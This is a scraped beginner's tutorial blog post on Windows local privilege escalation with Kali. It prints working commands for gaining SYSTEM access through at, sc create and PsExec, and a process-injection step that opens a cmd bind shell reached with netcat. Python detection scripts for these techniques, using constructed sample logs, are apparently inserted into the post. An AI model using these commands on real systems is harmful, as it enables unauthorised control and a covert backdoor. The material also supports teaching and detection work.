Newbie Diary 21: Kali penetration testing, privilege escalation (I): local privilege escalation

Source: Internet
Author: User
Tags: net command

Local privilege escalation, simply put, means exploiting a vulnerability so that a very low-privileged, restricted user can be elevated to the highest authority on the system. A privilege escalation vulnerability is usually a "second-stage" vulnerability: once an attacker has got into the target machine by some means, it is used to move up to a higher privilege level. That does not make the vulnerability less serious or harder to use; often it is more easily exploited, and its consequences are more frightening than those of a remote vulnerability. Such vulnerabilities are in fact far rarer than remote ones, and a Microsoft local privilege escalation can fetch millions of dollars on the foreign market.

Remote vulnerabilities are very common: when a website has a problem it may be defaced and a webshell (a tool for controlling the web server) planted, but at that point the permissions are very low. The attacker cannot plant a Trojan, control the target machine, or penetrate deeper to the machines behind the server. The same holds on an enterprise intranet: these network environments normally have user rights controls, so even a Trojan will have no impact and cannot spread. A local privilege escalation vulnerability on any of those machines breaks through all of this completely.

Collection of privilege escalation methods (portal link): http://www.360doc.com/content/06/0614/20/2311_134707.shtml

Windows system user rights division:
Administrators: the administrators group. By default, users in Administrators have unrestricted full access to the computer/domain. The default permissions assigned to the group allow full control of the entire system, so only trusted people should become members of this group.

Users: the normal user group. Users in this group cannot make intentional or unintentional system-wide changes. As a result, they can run certified applications but cannot run most legacy applications. The Users group is the safest group because the default permissions assigned to it do not allow members to modify operating system settings or other users' profiles, and it provides the safest environment for running programs. On NTFS-formatted volumes, the default security settings are designed to prevent members of the group from compromising the integrity of the operating system and installed programs. Users cannot modify system registry settings, operating system files, or program files. Users can shut down a workstation but cannot shut down a server. Users can create local groups, but can only modify the local groups they create themselves.

System: has the same or even higher permissions than Administrators, but no user can be added to this group, and it is not shown when listing user groups; it is the system's own group. It grants the permissions that the system and system-level services need in order to run properly.

Linux System User Rights Division

Users: ordinary users

Root: the administrator account

Windows privilege escalation (both the command line and the graphical interface can be used)

net command

Built-in accounts seen in net user output: HelpAssistant is the account for Remote Assistance; SUPPORT_388945a0 is the Help and Support Service account.

net user xuan   # view the current account's information (the account here is named xuan)

Privilege escalation: elevating Administrator privileges to SYSTEM privileges

1. The at command (at /? for help)   # only usable on XP and Server 2003

at <time> /interactive cmd   # schedule a time; /interactive runs the command interactively instead of in the background

# from that window, run taskmgr, kill the current user's desktop process and restart it; the entire interface then runs as the administrator

Every operation performed at this point runs under the SYSTEM account.

2. The sc command   # usable on Win7 and Win8. Principle: create a service (services run under the SYSTEM account by default)

sc create syscmd binpath= "cmd /k start" type= own type= interact   # opens a new command-line window; type= own gives the service its own process, type= interact lets it interact with the desktop

The service is not started by default.

Start it from the command line with: sc start syscmd

3. The Sysinternals suite   (anyone who works with Windows systems should learn to use this suite)

https://technet.microsoft.com/en-us/sysinternals/bb545027   (reference book: Windows Internals)

whoami tool: copy it into System32 on the C: drive and run it

PsExec.exe -i -s cmd   # -i: interactive mode; -s: run under the SYSTEM account
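Each of the three methods above leaves a record a defender can look for: the at /interactive job shows up as an at.exe process-creation event (Security 4688, when command-line auditing is enabled), and the sc-created service and PsExec both trigger a new-service event (System 7045) whose image path is a shell or whose service name is PSEXESVC. The Python below is an added detection example, not part of the original post; the event records are constructed samples using a flattened subset of the real event field names, and the rule function names are mine.

```python
import re
from typing import Optional

# Constructed sample events (not real logs): a flattened subset of the fields
# Windows writes for Security 4688 (process creation) and System 7045
# (a new service was installed in the system).
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "xuan",
     "NewProcessName": r"C:\Windows\System32\at.exe",
     "CommandLine": "at 23:05 /interactive cmd"},
    {"EventID": 4688, "SubjectUserName": "xuan",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 7045, "ServiceName": "syscmd", "AccountName": "LocalSystem",
     "ImagePath": "cmd /k start"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "BackupAgent", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
]

# A service whose binary is a shell or script host is suspicious: a real
# installer registers a dedicated executable, not cmd.exe.
SHELL_IMAGE_RE = re.compile(
    r"(^|[\\\s\"])(cmd|powershell|wscript|cscript)(\.exe)?\b", re.I)


def check_interactive_at(event) -> Optional[str]:
    """Flag at.exe scheduling a job with /interactive (the method-1 technique)."""
    if event.get("EventID") != 4688:
        return None
    image = event.get("NewProcessName", "").lower()
    cmdline = event.get("CommandLine", "")
    if image.endswith("\\at.exe") and "/interactive" in cmdline.lower():
        return f"at.exe interactive job by {event.get('SubjectUserName')}: {cmdline}"
    return None


def check_service_install(event) -> Optional[str]:
    """Flag 7045 installs that look like an sc-created shell or a PsExec service."""
    if event.get("EventID") != 7045:
        return None
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    if name.upper() == "PSEXESVC":
        return f"PsExec service installed (ImagePath {path})"
    if SHELL_IMAGE_RE.search(path):
        return f"service {name!r} runs a shell as {event.get('AccountName')}: {path}"
    return None


RULES = (check_interactive_at, check_service_install)


def scan(events):
    """Run every rule over every event; return (rule name, detail) pairs in order."""
    hits = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append((rule.__name__, detail))
    return hits


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

On a real host the same rules would be fed from the Security and System logs (for example via a SIEM export); the benign notepad and BackupAgent records are included so that the rules can be seen to ignore ordinary activity.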

4. Privilege escalation by process injection   (equivalent to opening a backdoor; very stealthy)

Inject a process into a system service process.

pinjector.exe (Process Injector)

http://www.tarasco.org/security/Process_Injector/

pinjector.exe -l   # list the processes available for injection

pinjector.exe -p <PID> cmd <port>

nc -nv <IP> <port>
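The injected cmd above is reachable because a service-hosting process is now listening on a port that the service itself never opened, and that is what a defender can check for: compare the listeners on the host against a per-host baseline of which service images legitimately listen where. The Python below is an added example and is not from the post or from the pinjector project; the netstat -ano output, the PID-to-image map and the baseline are all constructed samples, and SERVICE_IMAGES and LISTEN_BASELINE are hypothetical names.

```python
import re

# Constructed sample output (not a real capture) in the layout of `netstat -ano`.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       764
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       1288
  TCP    192.168.1.5:49700      203.0.113.10:443       ESTABLISHED     2316
  UDP    0.0.0.0:123            *:*                                    988
"""

# Constructed PID -> image map, as `tasklist` would report it.
PROCESS_SAMPLE = {764: "svchost.exe", 4: "System", 1288: "spoolsv.exe",
                  2316: "browser.exe", 988: "svchost.exe"}

# Hypothetical per-host baseline: (image, protocol, port) triples that are expected.
LISTEN_BASELINE = {("svchost.exe", "TCP", 135), ("System", "TCP", 445),
                   ("svchost.exe", "UDP", 123)}

# Processes that host Windows services and are therefore injection targets worth watching.
SERVICE_IMAGES = {"System", "svchost.exe", "services.exe", "lsass.exe", "spoolsv.exe"}

# Proto, local addr:port, foreign addr, optional state (UDP has none), PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text):
    """Return (proto, local_port, state, pid) for each socket line; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, _addr, port, _foreign, state, pid = m.groups()
        rows.append((proto, int(port), state or "", int(pid)))
    return rows


def unexpected_listeners(rows, processes, baseline):
    """Return listeners in service-hosting processes that the baseline does not explain."""
    findings = []
    for proto, port, state, pid in rows:
        # A TCP socket listens when in LISTENING state; a bound UDP socket has no state.
        listening = state == "LISTENING" or (proto == "UDP" and state == "")
        if not listening:
            continue
        image = processes.get(pid, "<unknown>")
        if image in SERVICE_IMAGES and (image, proto, port) not in baseline:
            findings.append((pid, image, proto, port))
    return findings


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    for pid, image, proto, port in unexpected_listeners(rows, PROCESS_SAMPLE, LISTEN_BASELINE):
        print(f"unexpected listener: {image} (PID {pid}) on {proto}/{port}")
```

The baseline is the part that takes real work: it has to be recorded from a known-good state of each host, and a service that later opens a port it never used before is the signal, not the port number itself.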

Newbie Diary, to be continued ...
